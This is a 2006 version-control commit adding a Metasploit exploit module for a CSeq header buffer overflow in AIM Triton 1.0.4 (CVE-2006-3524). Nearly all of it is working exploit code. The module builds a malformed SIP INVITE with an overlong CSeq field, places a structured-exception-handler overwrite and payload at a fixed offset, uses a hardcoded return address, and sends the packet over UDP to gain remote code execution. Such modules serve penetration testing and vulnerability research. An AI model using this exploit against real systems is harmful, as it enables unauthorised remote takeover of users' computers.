add exploit module aim_triton_cseq.rb

git-svn-id: file:///home/svn/framework3/trunk@4102 4d416f70-5f16-0410-b530-b9f4589650da
2006-11-02 01:16:40 +00:00 · 2006-11-02 01:16:40 +00:00 · 000f8d2e2b
parent c38037cb17
commit 000f8d2e2b
1 changed files with 85 additions and 0 deletions
--- a/modules/exploits/windows/sip/aim_triton_cseq.rb
+++ b/modules/exploits/windows/sip/aim_triton_cseq.rb
@ -0,0 +1,85 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Sip::Aim_Triton_Cseq < Msf::Exploit::Remote
+
+	include Exploit::Remote::Udp
+	include Exploit::Remote::Seh
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'AIM Triton 1.0.4 CSeq Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a buffer overflow in AOL's AIM
+				Triton 1.0.4. By sending an overly long CSeq value, 
+				a remote attacker could overflow a buffer and execute 
+				arbitrary code on the system with the privileges of 
+				the affected application. 
+			},
+			'Author'         => 'MC',
+			'Version'        => '$Revision: 1.0 $',
+            		'References'     => 
+				[ 
+                                        ['BID', '18906'],
+                                        ['CVE', '2006-3524'],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'seh',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 400,
+					'BadChars' => "\x00\x0a\x20\x09\x0d",
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			
+			'Targets'        =>
+				[
+                                        [ 'AIM Triton 1.0.4 Universal', { 'Ret' => 0x4017b3d9 } ], # coolcore45.dll 
+				],
+
+			'Privileged'     => false,
+
+			'DisclosureDate' => 'July 10 2006',
+
+			'DefaultTarget' => 0))
+
+			register_options(
+    			[
+            			Opt::RPORT(5061)
+    			], self)
+
+	end
+
+	def exploit
+		connect_udp
+
+		print_status("Trying target #{target.name}...")
+
+        	user   = Rex::Text.rand_text_english(2, payload_badchars)
+		port   = rand(65535).to_s      
+                filler = Rex::Text.rand_text_english(792, payload_badchars)
+                seh    = generate_seh_payload(target.ret)
+                filler[780, seh.length] = seh
+
+                sploit  =   "INVITE sip:#{user}\@127.0.0.1 SIP/2.0" + "\r\n"
+          	sploit  <<  "To: <sip:#{rhost}:#{rport}>" + "\r\n"
+                sploit  <<  "Via: SIP/2.0/UDP #{rhost}:#{port}" + "\r\n"
+          	sploit  <<  "From: \"#{user}\"<sip:#{rhost}:#{port}>" + "\r\n"
+                sploit  <<  "Call-ID: #{(rand(100)+100).to_s}#{rhost}" + "\r\n"
+                sploit  <<  "CSeq: " + filler + "\r\n"
+          	sploit  <<  "Max-Forwards: 20" +  "\r\n"
+          	sploit  <<  "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n"
+ 
+		udp_sock.put(sploit)
+
+		handler
+        	disconnect_udp
+                
+	end
+
+end
+end